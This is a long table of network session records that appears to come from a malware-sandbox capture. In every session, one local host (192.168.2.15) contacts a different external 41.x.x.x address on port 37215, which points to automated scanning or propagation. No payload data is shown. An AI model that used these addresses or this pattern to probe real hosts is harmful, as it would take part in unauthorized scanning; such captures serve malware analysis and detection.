                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10121192.168.2.156099441.54.227.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10122192.168.2.155012441.51.45.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10123192.168.2.154139441.38.10.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10124192.168.2.154758841.209.139.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10125192.168.2.155254841.187.179.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10126192.168.2.156030041.226.96.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10127192.168.2.156035641.168.66.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10128192.168.2.153769841.208.174.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10129192.168.2.154620441.3.161.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10130192.168.2.155871841.98.113.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10131192.168.2.154523041.233.0.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10132192.168.2.155236241.48.249.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10133192.168.2.154243441.192.208.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10134192.168.2.153788041.21.58.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10135192.168.2.155018041.105.200.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10136192.168.2.155967841.222.165.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10137192.168.2.154712241.149.53.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10138192.168.2.155336441.36.3.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10139192.168.2.155951441.234.5.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10140192.168.2.154255041.72.15.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10141192.168.2.155050241.242.128.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10142192.168.2.155346441.238.12.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10143192.168.2.154266041.178.15.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10144192.168.2.155341241.179.17.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10145192.168.2.154500641.74.82.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10146192.168.2.155249641.217.49.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10147192.168.2.155858441.130.184.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10148192.168.2.155797641.220.81.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10149192.168.2.154056041.76.151.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10150192.168.2.153307241.121.45.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10151192.168.2.154142441.158.138.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10152192.168.2.154682841.212.190.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10153192.168.2.154261041.5.240.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10154192.168.2.153353041.69.201.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10155192.168.2.155437841.102.82.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10156192.168.2.154258641.29.254.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10157192.168.2.153757241.169.220.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10158192.168.2.155670041.252.208.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10159192.168.2.154891841.49.27.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10160192.168.2.153979241.103.196.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10161192.168.2.154785041.39.243.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10162192.168.2.154885041.234.125.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10163192.168.2.154576841.165.54.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10164192.168.2.155638641.79.87.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10165192.168.2.154732841.214.87.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10166192.168.2.154217641.117.188.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10167192.168.2.153915241.5.95.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10168192.168.2.155112041.224.133.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10169192.168.2.153994041.189.207.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10170192.168.2.155432441.207.188.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10171192.168.2.154442241.233.71.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10172192.168.2.155167241.2.25.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10173192.168.2.155753041.140.222.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10174192.168.2.154410841.77.196.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10175192.168.2.154332441.9.140.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10176192.168.2.156042041.214.71.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10177192.168.2.156010641.68.146.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10178192.168.2.154726641.62.136.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10179192.168.2.154058041.174.220.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10180192.168.2.155951041.252.142.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10181192.168.2.155946841.200.70.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10182192.168.2.154876041.237.130.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10183192.168.2.154369441.72.45.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10184192.168.2.155732841.191.88.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10185192.168.2.155977441.247.164.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10186192.168.2.154917841.115.52.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10187192.168.2.155138241.190.6.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10188192.168.2.154337641.48.180.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10189192.168.2.155948841.12.179.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10190192.168.2.155938441.71.21.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10191192.168.2.155531041.242.128.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10192192.168.2.154848241.31.55.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10193192.168.2.154752041.176.159.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10194192.168.2.155273441.123.245.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10195192.168.2.153971841.204.213.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10196192.168.2.153752641.90.72.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10197192.168.2.155513441.64.82.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10198192.168.2.153388441.46.165.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10199192.168.2.155820641.245.23.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10200192.168.2.154192241.103.33.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10201192.168.2.153728441.253.114.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10202192.168.2.153314641.53.4.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10203192.168.2.154162241.232.203.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10204192.168.2.154357041.49.60.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10205192.168.2.153512841.35.84.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10206192.168.2.156047841.82.68.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10207192.168.2.156055641.165.179.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10208192.168.2.154414041.210.127.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10209192.168.2.153612041.120.180.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10210192.168.2.155008641.36.248.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10211192.168.2.154665841.108.255.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10212192.168.2.155201641.85.28.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10213192.168.2.155759441.100.67.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10214192.168.2.155217041.153.114.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10215192.168.2.155522041.105.53.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10216192.168.2.155565041.92.110.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10217192.168.2.155918441.239.132.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10218192.168.2.154482841.122.156.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10219192.168.2.155405641.20.137.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10220192.168.2.153613241.119.168.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10221192.168.2.155030041.92.129.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10222192.168.2.153505241.228.8.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10223192.168.2.155670641.74.87.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10224192.168.2.154179441.41.61.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10225192.168.2.154446441.154.204.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10226192.168.2.154179041.129.203.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10227192.168.2.155013841.82.177.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10228192.168.2.156039241.181.99.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10229192.168.2.154819641.16.216.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10230192.168.2.155250641.3.107.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10231192.168.2.155536041.117.23.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10232192.168.2.154064441.240.170.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10233192.168.2.155565241.25.166.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10234192.168.2.153664441.132.90.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10235192.168.2.155945241.245.99.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10236192.168.2.155102841.142.54.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10237192.168.2.154827241.195.213.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10238192.168.2.153401841.161.161.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10239192.168.2.155192441.193.203.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10240192.168.2.154346641.121.183.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10241192.168.2.154185041.106.36.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10242192.168.2.155343241.82.183.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10243192.168.2.153419441.235.45.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10244192.168.2.156084041.49.41.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10245192.168.2.155690841.150.170.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10246192.168.2.153815441.193.56.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10247192.168.2.154670441.71.15.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10248192.168.2.154956641.181.79.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10249192.168.2.154124841.35.10.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10250192.168.2.153532441.86.22.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10251192.168.2.154489041.196.178.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10252192.168.2.155698641.118.167.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10253192.168.2.154442241.88.121.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10254192.168.2.156029441.220.85.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10255192.168.2.155371841.145.229.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10256192.168.2.153586641.81.14.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10257192.168.2.154146041.137.139.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10258192.168.2.154131241.241.220.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10259192.168.2.155228241.36.130.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10260192.168.2.153631041.14.213.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10261192.168.2.153842441.187.137.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10262192.168.2.154563441.145.161.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10263192.168.2.154278441.58.226.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10264192.168.2.154832441.12.5.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10265192.168.2.154685441.142.1.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10266192.168.2.155997641.159.175.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10267192.168.2.154243841.112.185.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10268192.168.2.153629841.223.166.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10269192.168.2.153909041.242.30.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10270192.168.2.155284841.216.3.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10271192.168.2.153636241.188.228.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10272192.168.2.155506841.42.29.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10273192.168.2.155620041.37.24.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10274192.168.2.155625441.175.46.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10275192.168.2.155598041.207.204.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10276192.168.2.153439641.179.165.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10277192.168.2.155345241.41.254.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10278192.168.2.153656441.203.211.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10279192.168.2.154798041.13.216.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10280192.168.2.153926041.145.115.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10281192.168.2.155950841.222.35.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10282192.168.2.154833441.132.149.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10283192.168.2.155799841.237.88.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10284192.168.2.153383641.108.111.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10285192.168.2.155031041.201.6.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10286192.168.2.153679441.99.137.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10287192.168.2.154228241.185.251.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10288192.168.2.153896241.187.105.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10289192.168.2.153765241.130.242.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10290192.168.2.154019041.129.199.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10291192.168.2.154693041.1.121.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10292192.168.2.155118241.53.252.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10293192.168.2.154098041.91.201.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10294192.168.2.155417041.153.118.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10295192.168.2.155969441.87.36.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10296192.168.2.153608441.227.239.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10297192.168.2.154021041.58.51.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10298192.168.2.155241441.108.126.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10299192.168.2.154903641.158.219.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10300192.168.2.155646441.82.105.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10301192.168.2.154713041.134.100.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10302192.168.2.154750641.20.196.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10303192.168.2.154658041.118.20.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10304192.168.2.153597041.172.44.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10305192.168.2.153950841.251.44.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10306192.168.2.153297441.77.242.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10307192.168.2.153325241.125.84.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10308192.168.2.155206441.190.79.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10309192.168.2.154743841.56.160.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10310192.168.2.155612441.158.215.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10311192.168.2.154903441.143.84.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10312192.168.2.154271641.73.166.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10313192.168.2.153875241.100.101.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10314192.168.2.155918441.233.240.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10315192.168.2.153689241.3.253.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10316192.168.2.154414241.14.216.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10317192.168.2.154825841.70.176.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10318192.168.2.155576241.144.213.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10319192.168.2.154182641.124.184.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10320192.168.2.154456441.251.206.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10321192.168.2.153554841.129.241.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10322192.168.2.154603041.213.38.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10323192.168.2.155076841.65.10.24837215
